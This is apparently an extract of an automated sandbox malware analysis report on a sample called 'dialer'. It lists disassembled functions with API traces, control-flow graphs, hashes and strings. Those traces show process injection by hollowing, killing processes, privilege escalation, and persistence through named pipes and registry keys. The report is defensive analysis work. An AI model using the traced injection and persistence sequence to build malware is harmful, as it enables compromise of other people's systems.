                                                        Function 00000001400014D8 Relevance: 19.6, APIs: 13, Instructions: 130memoryCOMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000027.00000002.3126754489.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                        • Associated: 00000027.00000002.3126364002.0000000140000000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000027.00000002.3127169767.0000000140003000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000027.00000002.3127533864.0000000140006000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_39_2_140000000_dialer.jbxd
                                                        Similarity
                                                        • API ID: Heap$Process$AllocEnumFree$CloseHandleMemoryModulesOpenProcessesRead
                                                        • String ID:
                                                        • API String ID: 4084875642-0
                                                        • Opcode ID: 3ba232721d1513b5cedada72c6e24bd118260bd52d62463099d565cdd5ea385d
                                                        • Instruction ID: 4858e5a3d965c592fcd1f5951e26bd94c88d4916acf90710a0b336d1aa1e032e
                                                        • Opcode Fuzzy Hash: 3ba232721d1513b5cedada72c6e24bd118260bd52d62463099d565cdd5ea385d
                                                        • Instruction Fuzzy Hash: E6519DB2711A819AEB66CF63E8587EA22A5F78DBC4F444025EF4947764DF38C545C700
                                                        Function 0000000140001F2C Relevance: 28.1, APIs: 14, Strings: 2, Instructions: 124filememorystringCOMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000027.00000002.3126754489.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                        • Associated: 00000027.00000002.3126364002.0000000140000000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000027.00000002.3127169767.0000000140003000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000027.00000002.3127533864.0000000140006000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_39_2_140000000_dialer.jbxd
                                                        Similarity
                                                        • API ID: FileHandle$CloseCreateModuleProtectVirtual$CurrentFreeInformationLibraryMappingProcessViewlstrcmpi
                                                        • String ID: .text$C:\Windows\System32\
                                                        • API String ID: 2721474350-832442975
                                                        • Opcode ID: ea51ffa9aeaeb0e2cf226d8574d2fabd87300f6e212f2c78447215b36c46b769
                                                        • Instruction ID: 0b364bd3c89a37fdd3fa7b369e4888cbeb1e5b170dc00cf86e963973e9165d3d
                                                        • Opcode Fuzzy Hash: ea51ffa9aeaeb0e2cf226d8574d2fabd87300f6e212f2c78447215b36c46b769
                                                        • Instruction Fuzzy Hash: CC518BB2204B8096EB62CF16F8587DAB3A5F78CBD4F444525AF4A03B68DF38C549C700
                                                        Function 0000000140002BF8 Relevance: 14.0, APIs: 6, Strings: 2, Instructions: 40sleepfilepipeCOMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000027.00000002.3126754489.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                        • Associated: 00000027.00000002.3126364002.0000000140000000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000027.00000002.3127169767.0000000140003000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000027.00000002.3127533864.0000000140006000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_39_2_140000000_dialer.jbxd
                                                        Similarity
                                                        • API ID: NamedPipe$DescriptorFileInitializeSecuritySleep$AllocAllocateConnectCreateDaclDisconnectEntriesLocalReadWrite
                                                        • String ID: M$\\.\pipe\dialerchildproc64
                                                        • API String ID: 2203880229-3489460547
                                                        • Opcode ID: 180580de56f56ab00dd4d516fca46f959342e05f281243e0c5337f45e18aa23b
                                                        • Instruction ID: 6dc3dc8c0bd617ca7cbe615ebfcb02ed857a87361961821bc60a1768ee808972
                                                        • Opcode Fuzzy Hash: 180580de56f56ab00dd4d516fca46f959342e05f281243e0c5337f45e18aa23b
                                                        • Instruction Fuzzy Hash: C01139B1218A8492F716DB22F8047EE6764A78DBE0F444225BB66036F4DF7CC548C700
                                                        Function 00000001400021D0 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 36sleeppipefileCOMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 129 1400021d0-1400021da 130 1400021dd-1400021f0 call 140001b54 129->130 133 1400021f2-1400021fb Sleep 130->133 134 1400021fd-14000220a ConnectNamedPipe 130->134 133->130 135 140002241-140002246 Sleep 134->135 136 14000220c-14000222d ReadFile 134->136 137 14000224c-140002255 DisconnectNamedPipe 135->137 136->137 138 14000222f-140002234 136->138 137->134 138->137 139 140002236-14000223f 138->139 139->137
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000027.00000002.3126754489.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                        • Associated: 00000027.00000002.3126364002.0000000140000000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000027.00000002.3127169767.0000000140003000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000027.00000002.3127533864.0000000140006000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_39_2_140000000_dialer.jbxd
                                                        Similarity
                                                        • API ID: NamedPipe$DescriptorInitializeSecuritySleep$AllocAllocateConnectCreateDaclDisconnectEntriesFileLocalRead
                                                        • String ID: \\.\pipe\dialercontrol_redirect64
                                                        • API String ID: 2071455217-3440882674
                                                        • Opcode ID: 33f89feb9858a4e39e6e7226b1872fe8dc0a47489d7e71beaca7a62b826bfc15
                                                        • Instruction ID: d66e41e89491d3fe39127ed5f8ff24c46c9ecc4af95d447005e5476a51c55f6d
                                                        • Opcode Fuzzy Hash: 33f89feb9858a4e39e6e7226b1872fe8dc0a47489d7e71beaca7a62b826bfc15
                                                        • Instruction Fuzzy Hash: 42014BB1204A40A2EA17EB63F8443E9B365A79DBE0F144235FB66476F4DF78C488C700
                                                        Function 0000000140001B54 Relevance: 9.1, APIs: 6, Instructions: 82memorypipeCOMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000027.00000002.3126754489.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                        • Associated: 00000027.00000002.3126364002.0000000140000000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000027.00000002.3127169767.0000000140003000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000027.00000002.3127533864.0000000140006000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_39_2_140000000_dialer.jbxd
                                                        Similarity
                                                        • API ID: DescriptorInitializeSecurity$AllocAllocateCreateDaclEntriesLocalNamedPipe
                                                        • String ID:
                                                        • API String ID: 3197395349-0
                                                        • Opcode ID: 488be1c38cf594ed0d3f6a94cbc7f0150440055c9cb1e58666deddfd8d25be8b
                                                        • Instruction ID: 21eaad2a8fcaa81d39f01622d1c01d05a8059e075f91819b3ade9b41c51f013a
                                                        • Opcode Fuzzy Hash: 488be1c38cf594ed0d3f6a94cbc7f0150440055c9cb1e58666deddfd8d25be8b
                                                        • Instruction Fuzzy Hash: FA318D72215691CAE761CF25F490BDE77A5F748B98F40521AFB4947FA8EB78C208CB40
                                                        Function 0000000140002B38 Relevance: 9.1, APIs: 6, Instructions: 58memoryCOMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 149 140002b38-140002b8c GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc 150 140002b8e-140002ba1 K32EnumProcesses 149->150 151 140002ba3-140002bb2 150->151 152 140002beb-140002bf4 SleepEx 150->152 153 140002bb4-140002bb8 151->153 154 140002bdc-140002be7 151->154 152->150 155 140002bba 153->155 156 140002bcb-140002bce call 140002540 153->156 154->152 157 140002bbe-140002bc3 155->157 160 140002bd2 156->160 158 140002bc5-140002bc9 157->158 159 140002bd6-140002bda 157->159 158->156 158->157 159->153 159->154 160->159
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000027.00000002.3126754489.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                        • Associated: 00000027.00000002.3126364002.0000000140000000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000027.00000002.3127169767.0000000140003000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000027.00000002.3127533864.0000000140006000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_39_2_140000000_dialer.jbxd
                                                        Similarity
                                                        • API ID: Heap$AllocProcess$EnumProcessesSleep
                                                        • String ID:
                                                        • API String ID: 3676546796-0
                                                        • Opcode ID: 8f13c2487408d17cabd0d6010e800d760c40d8336c2ba260ca50616313c4bb70
                                                        • Instruction ID: 9c67988e037e7d22bad9650836966df18df348572cafe7f0e6f30b42da554bff
                                                        • Opcode Fuzzy Hash: 8f13c2487408d17cabd0d6010e800d760c40d8336c2ba260ca50616313c4bb70
                                                        • Instruction Fuzzy Hash: 3A115CB26006518AE72ACF17F85579A77A6F78DBC1F154028EB4607B68CF39D881CB40
                                                        Function 00000001400017EC Relevance: 9.1, APIs: 6, Instructions: 55memoryCOMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        APIs
                                                        • GetProcessHeap.KERNEL32(?,00000000,?,000000014000238B,?,?,?,?,?,?,?,?,?,?,?,0000000140002261), ref: 0000000140001801
                                                        • HeapAlloc.KERNEL32(?,00000000,?,000000014000238B,?,?,?,?,?,?,?,?,?,?,?,0000000140002261), ref: 0000000140001812
                                                          • Part of subcall function 00000001400014D8: GetProcessHeap.KERNEL32 ref: 000000014000150B
                                                          • Part of subcall function 00000001400014D8: HeapAlloc.KERNEL32 ref: 000000014000151E
                                                          • Part of subcall function 00000001400014D8: GetProcessHeap.KERNEL32 ref: 000000014000152C
                                                          • Part of subcall function 00000001400014D8: HeapAlloc.KERNEL32 ref: 000000014000153D
                                                          • Part of subcall function 00000001400014D8: K32EnumProcesses.KERNEL32 ref: 0000000140001557
                                                          • Part of subcall function 00000001400014D8: OpenProcess.KERNEL32 ref: 0000000140001585
                                                          • Part of subcall function 00000001400014D8: K32EnumProcessModules.KERNEL32 ref: 00000001400015AA
                                                          • Part of subcall function 00000001400014D8: ReadProcessMemory.KERNELBASE ref: 00000001400015E1
                                                          • Part of subcall function 00000001400014D8: CloseHandle.KERNELBASE ref: 000000014000161D
                                                          • Part of subcall function 00000001400014D8: GetProcessHeap.KERNEL32 ref: 000000014000162F
                                                          • Part of subcall function 00000001400014D8: RtlFreeHeap.NTDLL ref: 000000014000163D
                                                          • Part of subcall function 00000001400014D8: GetProcessHeap.KERNEL32 ref: 0000000140001643
                                                          • Part of subcall function 00000001400014D8: RtlFreeHeap.NTDLL ref: 0000000140001651
                                                        • OpenProcess.KERNEL32 ref: 0000000140001859
                                                        • TerminateProcess.KERNELBASE ref: 000000014000186C
                                                        • CloseHandle.KERNEL32 ref: 0000000140001875
                                                        • GetProcessHeap.KERNEL32 ref: 0000000140001885
                                                        Memory Dump Source
                                                        • Source File: 00000027.00000002.3126754489.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                        • Associated: 00000027.00000002.3126364002.0000000140000000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000027.00000002.3127169767.0000000140003000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000027.00000002.3127533864.0000000140006000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_39_2_140000000_dialer.jbxd
                                                        Similarity
                                                        • API ID: HeapProcess$Alloc$CloseEnumFreeHandleOpen$MemoryModulesProcessesReadTerminate
                                                        • String ID:
                                                        • API String ID: 1323846700-0
                                                        • Opcode ID: 292de27f87d02887c134cd68883e15ba7f6a186f84d3e8f804eb1f1d2b0452f5
                                                        • Instruction ID: e8e8f15008253283e0d5a10c8ea57e573901c1344bffe788f1ea91b5e390c365
                                                        • Opcode Fuzzy Hash: 292de27f87d02887c134cd68883e15ba7f6a186f84d3e8f804eb1f1d2b0452f5
                                                        • Instruction Fuzzy Hash: C8115BB1B05A4186FB1ADF27F8443D966A6ABCDBC4F188038EF09037B5DE38C5868700
                                                        Function 00000001400018AC Relevance: 4.5, APIs: 3, Instructions: 30COMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 173 1400018ac-1400018d6 OpenProcess 174 140001901-140001912 173->174 175 1400018d8-1400018e8 IsWow64Process 173->175 176 1400018f8-1400018fb CloseHandle 175->176 177 1400018ea-1400018f3 175->177 176->174 177->176
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000027.00000002.3126754489.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                        • Associated: 00000027.00000002.3126364002.0000000140000000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000027.00000002.3127169767.0000000140003000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000027.00000002.3127533864.0000000140006000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_39_2_140000000_dialer.jbxd
                                                        Similarity
                                                        • API ID: Process$CloseHandleOpenWow64
                                                        • String ID:
                                                        • API String ID: 10462204-0
                                                        • Opcode ID: 6d646fbe37808f9b584e9cbd293ea6613d1d1a58a609fbda32c726050c0f507a
                                                        • Instruction ID: a864651f2e5c17a125c4a55b2f5ca9b47fcd1256b8d640ad9fe9232b2a40a049
                                                        • Opcode Fuzzy Hash: 6d646fbe37808f9b584e9cbd293ea6613d1d1a58a609fbda32c726050c0f507a
                                                        • Instruction Fuzzy Hash: 77F01D7170578192EB56CF17B584399A665E78CBC0F449039EB8943768DF39C4858700
                                                        Function 0000000140002258 Relevance: 1.5, APIs: 1, Instructions: 4COMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 178 140002258-14000225c call 14000226c 180 140002261-140002263 ExitProcess 178->180
                                                        APIs
                                                          • Part of subcall function 000000014000226C: GetCurrentProcessId.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,0000000140002261), ref: 000000014000228F
                                                          • Part of subcall function 000000014000226C: OpenProcess.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,0000000140002261), ref: 000000014000229F
                                                          • Part of subcall function 000000014000226C: OpenProcessToken.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,0000000140002261), ref: 00000001400022B9
                                                          • Part of subcall function 000000014000226C: LookupPrivilegeValueW.ADVAPI32 ref: 00000001400022D0
                                                          • Part of subcall function 000000014000226C: AdjustTokenPrivileges.KERNELBASE ref: 0000000140002308
                                                          • Part of subcall function 000000014000226C: GetLastError.KERNEL32 ref: 0000000140002312
                                                          • Part of subcall function 000000014000226C: CloseHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,0000000140002261), ref: 000000014000231B
                                                          • Part of subcall function 000000014000226C: FindResourceExA.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,0000000140002261), ref: 000000014000232F
                                                          • Part of subcall function 000000014000226C: SizeofResource.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,0000000140002261), ref: 0000000140002346
                                                          • Part of subcall function 000000014000226C: LoadResource.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,0000000140002261), ref: 000000014000235F
                                                          • Part of subcall function 000000014000226C: LockResource.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,0000000140002261), ref: 0000000140002371
                                                          • Part of subcall function 000000014000226C: GetCurrentProcessId.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,0000000140002261), ref: 000000014000237E
                                                          • Part of subcall function 000000014000226C: RegCreateKeyExW.KERNELBASE ref: 00000001400023BE
                                                          • Part of subcall function 000000014000226C: ConvertStringSecurityDescriptorToSecurityDescriptorW.ADVAPI32 ref: 00000001400023E5
                                                          • Part of subcall function 000000014000226C: RegSetKeySecurity.KERNELBASE ref: 00000001400023FE
                                                          • Part of subcall function 000000014000226C: LocalFree.KERNEL32 ref: 0000000140002408
                                                        • ExitProcess.KERNEL32 ref: 0000000140002263
                                                        Memory Dump Source
                                                        • Source File: 00000027.00000002.3126754489.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                        • Associated: 00000027.00000002.3126364002.0000000140000000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000027.00000002.3127169767.0000000140003000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000027.00000002.3127533864.0000000140006000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_39_2_140000000_dialer.jbxd
                                                        Similarity
                                                        • API ID: Process$Resource$Security$CurrentDescriptorOpenToken$AdjustCloseConvertCreateErrorExitFindFreeHandleLastLoadLocalLockLookupPrivilegePrivilegesSizeofStringValue
                                                        • String ID:
                                                        • API String ID: 3836936051-0
                                                        • Opcode ID: c7c2c95b7158c919dbdf86fa47620a0d13b0befc2d5611a3b20bc48f104c5c5f
                                                        • Instruction ID: 542f07df19912b07f19d0c3647b83d0aa38d4f887fbb8c9b09a79fc57a6ac5cd
                                                        • Opcode Fuzzy Hash: c7c2c95b7158c919dbdf86fa47620a0d13b0befc2d5611a3b20bc48f104c5c5f
                                                        • Instruction Fuzzy Hash: 84A002B1F1794096FA0BB7F7785E3DC21656B9CB82F500415B242472B2DD3C44558716

                                                        Non-executed Functions

                                                        Function 0000000140002560 Relevance: 47.5, APIs: 24, Strings: 3, Instructions: 296memoryregistryfileCOMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 189 140002560-14000258c 190 140002592 189->190 191 14000273a-140002742 189->191 192 1400026c6-1400026fe GetProcessHeap HeapAlloc K32EnumProcesses 190->192 193 140002598-14000259f 190->193 194 140002748-14000274b 191->194 195 14000297e-1400029a2 ReadFile 191->195 196 140002a74-140002a8e 192->196 198 140002704-140002715 192->198 199 1400025a5-1400025a8 193->199 200 1400026bd-1400026bf ExitProcess 193->200 201 140002751-140002756 194->201 202 140002974-140002979 call 14000175c 194->202 195->196 197 1400029a8-1400029af 195->197 197->196 206 1400029b5-1400029c9 call 1400018ac 197->206 198->196 207 14000271b-140002733 call 1400010c0 198->207 208 1400025ae-1400025b1 199->208 209 140002660-14000268b RegOpenKeyExW 199->209 203 140002919-14000292c call 140001944 201->203 204 14000275c-14000275f 201->204 202->196 203->196 231 140002932-140002941 call 140001944 203->231 210 140002761-140002766 204->210 211 14000279d-1400027ae call 140001944 204->211 206->196 229 1400029cf-1400029d5 206->229 232 140002735 207->232 218 140002651-14000265b 208->218 219 1400025b7-1400025ba 208->219 216 1400026a1-1400026b8 call 1400019c4 call 14000175c call 140001000 call 1400017ec 209->216 217 14000268d-14000269b RegDeleteValueW 209->217 210->196 220 14000276c-140002796 call 14000217c call 1400021a8 ExitProcess 210->220 211->196 240 1400027b4-1400027d6 ReadFile 211->240 216->196 217->216 218->196 226 140002644-14000264c 219->226 227 1400025c0-1400025c5 219->227 226->196 227->196 234 1400025cb-1400025ef ReadFile 227->234 238 1400029db-140002a16 GetProcessHeap HeapAlloc call 1400014d8 229->238 239 140002a5f 229->239 231->196 255 140002947-14000296f ShellExecuteW 231->255 232->196 234->196 236 1400025f5-1400025fc 234->236 236->196 243 140002602-140002616 call 1400018ac 236->243 258 140002a18-140002a1e 238->258 259 140002a49-140002a4f GetProcessHeap 238->259 245 140002a66-140002a6f call 140002a90 239->245 240->196 247 1400027dc-1400027e3 240->247 243->196 264 14000261c-140002622 243->264 245->196 247->196 254 1400027e9-140002827 GetProcessHeap HeapAlloc ReadFile 247->254 260 14000290b-140002914 GetProcessHeap 254->260 261 14000282d-140002839 254->261 255->196 258->259 265 140002a20-140002a32 258->265 262 140002a52-140002a5d HeapFree 259->262 260->262 261->260 266 14000283f-14000284b 261->266 262->196 268 140002624-140002633 call 1400010c0 264->268 269 140002638-14000263f 264->269 270 140002a34-140002a36 265->270 271 140002a38-140002a40 265->271 266->260 272 140002851-14000285c 266->272 268->196 269->245 270->271 276 140002a44 call 1400016cc 270->276 271->259 277 140002a42 271->277 273 140002881-140002905 lstrlenW GetProcessHeap HeapAlloc call 140002a90 GetProcessHeap HeapFree 272->273 274 14000285e-140002869 272->274 273->260 274->260 278 14000286f-14000287c call 140001c88 274->278 276->259 277->265 278->260
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000027.00000002.3126754489.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                        • Associated: 00000027.00000002.3126364002.0000000140000000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000027.00000002.3127169767.0000000140003000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000027.00000002.3127533864.0000000140006000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_39_2_140000000_dialer.jbxd
                                                        Similarity
                                                        • API ID: Process$Open$File$CloseExitHandleHeapName$AllocDeleteEnumFindInformationModulePathProcessesQueryReadTokenValueWow64lstrlen
                                                        • String ID: SOFTWARE$dialerstager$open
                                                        • API String ID: 3276259517-3931493855
                                                        • Opcode ID: ae79544a1ca264f77e0040c582fad8c70a14f3da5095032f2fa0f831f935a8fc
                                                        • Instruction ID: ae65b9042581f7dc9e2ee581e3d1b52dcddb088aa692a5b8ad70e1a65f9de3a1
                                                        • Opcode Fuzzy Hash: ae79544a1ca264f77e0040c582fad8c70a14f3da5095032f2fa0f831f935a8fc
                                                        • Instruction Fuzzy Hash: 91D14DB13046818BEB7BDF26B8143E92269F74DBC8F404125BB4A47AB9DE78C605C741
                                                        Function 0000000140001C88 Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 154injectionthreadmemoryCOMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 285 140001c88-140001cb8 286 140001cbb-140001cc8 285->286 287 140001e8c-140001e91 286->287 288 140001cce-140001d25 CreateProcessW 286->288 287->286 291 140001e97 287->291 289 140001e88 288->289 290 140001d2b-140001d5a VirtualAllocEx 288->290 289->287 292 140001e5d-140001e60 290->292 293 140001d60-140001d7b WriteProcessMemory 290->293 294 140001e99-140001eb9 291->294 295 140001e62-140001e76 OpenProcess 292->295 296 140001e85 292->296 293->292 297 140001d81-140001d87 293->297 295->289 298 140001e78-140001e83 TerminateProcess 295->298 296->289 299 140001dd2-140001def VirtualAlloc 297->299 300 140001d89 297->300 298->289 299->292 301 140001df1-140001e07 GetThreadContext 299->301 302 140001d8c-140001dba WriteProcessMemory 300->302 301->292 304 140001e09-140001e2e WriteProcessMemory 301->304 302->292 303 140001dc0-140001dcc 302->303 303->302 305 140001dce 303->305 304->292 306 140001e30-140001e4c SetThreadContext 304->306 305->299 306->292 307 140001e4e-140001e5b ResumeThread 306->307 307->292 308 140001eba-140001ebf 307->308 308->294
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000027.00000002.3126754489.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                        • Associated: 00000027.00000002.3126364002.0000000140000000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000027.00000002.3127169767.0000000140003000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000027.00000002.3127533864.0000000140006000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_39_2_140000000_dialer.jbxd
                                                        Similarity
                                                        • API ID: Process$MemoryThreadWrite$AllocContextVirtual$CreateOpenResumeTerminate
                                                        • String ID: @
                                                        • API String ID: 3462610200-2766056989
                                                        • Opcode ID: 9e87a73b0eb69cfa39acb8f7a19e25e40ab225c9e7017233cfa86b54780bd9da
                                                        • Instruction ID: 5c16bc39e07cf5e776479c29415d8ab36f8b64b080a4e80c067f24e51f003d21
                                                        • Opcode Fuzzy Hash: 9e87a73b0eb69cfa39acb8f7a19e25e40ab225c9e7017233cfa86b54780bd9da
                                                        • Instruction Fuzzy Hash: B55122B2700A808AEB52CF66E8447DE77A5FB88BD8F054125EF4997B68DF38C855C700
                                                        Function 00000001400019C4 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 102memorycomCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000027.00000002.3126754489.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                        • Associated: 00000027.00000002.3126364002.0000000140000000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000027.00000002.3127169767.0000000140003000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000027.00000002.3127533864.0000000140006000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_39_2_140000000_dialer.jbxd
                                                        Similarity
                                                        • API ID: String$AllocFreeInitialize$CreateInitInstanceSecurityUninitializeVariant
                                                        • String ID: dialersvc64
                                                        • API String ID: 4184240511-3881820561
                                                        • Opcode ID: c5773a1fcac1982b1b845e0e6ec66c21fb3e8571a559d525fc626bf24240b323
                                                        • Instruction ID: f04b9e4fe08d72b668f3c34f73b3c63bb96ebc933f76805d9c48aa5d26f439e8
                                                        • Opcode Fuzzy Hash: c5773a1fcac1982b1b845e0e6ec66c21fb3e8571a559d525fc626bf24240b323
                                                        • Instruction Fuzzy Hash: 69415A72704A819AE712CF6AE8543DD73B5FB89B89F044125EF4E47A64DF38D149C300
                                                        Function 0000000140001000 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 37registryCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000027.00000002.3126754489.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                        • Associated: 00000027.00000002.3126364002.0000000140000000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000027.00000002.3127169767.0000000140003000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000027.00000002.3127533864.0000000140006000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_39_2_140000000_dialer.jbxd
                                                        Similarity
                                                        • API ID: Delete$CloseEnumOpen
                                                        • String ID: SOFTWARE\dialerconfig
                                                        • API String ID: 3013565938-461861421
                                                        • Opcode ID: 771b17fd0f1a16041f26a54d46b0ec7916154baef178d5f18a2b3dcc43556395
                                                        • Instruction ID: 8f4ace04a6ff3505bb025a84b088d585f414f6eddbaae7ea6d4a7c6b6057ac94
                                                        • Opcode Fuzzy Hash: 771b17fd0f1a16041f26a54d46b0ec7916154baef178d5f18a2b3dcc43556395
                                                        • Instruction Fuzzy Hash: 2F1186B2714A8486E762CF26F8557E92378F78C7D8F404215A74D0BAA8DF7CC248CB54
                                                        Function 0000000140002A90 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 42fileCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000027.00000002.3126754489.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                        • Associated: 00000027.00000002.3126364002.0000000140000000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000027.00000002.3127169767.0000000140003000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000027.00000002.3127533864.0000000140006000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_39_2_140000000_dialer.jbxd
                                                        Similarity
                                                        • API ID: File$Write$CloseCreateHandle
                                                        • String ID: \\.\pipe\dialercontrol_redirect64
                                                        • API String ID: 148219782-3440882674
                                                        • Opcode ID: 883fb3da148993cb75da2269ecc4fc0d73b62e41bf5aa7103fd26e0bcaccd1b9
                                                        • Instruction ID: c657f3a7a6ba8077c0f3fca19c98ae9a251d12aa6ce49f65425284bb78429f7a
                                                        • Opcode Fuzzy Hash: 883fb3da148993cb75da2269ecc4fc0d73b62e41bf5aa7103fd26e0bcaccd1b9
                                                        • Instruction Fuzzy Hash: AE1139B6720B5082EB16CF16F818399A764F78DFE4F544215AB6907BA4CF78C549CB40
                                                        Function 0000000140001914 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 14libraryloaderCOMMON
                                                        Download Yara Rule
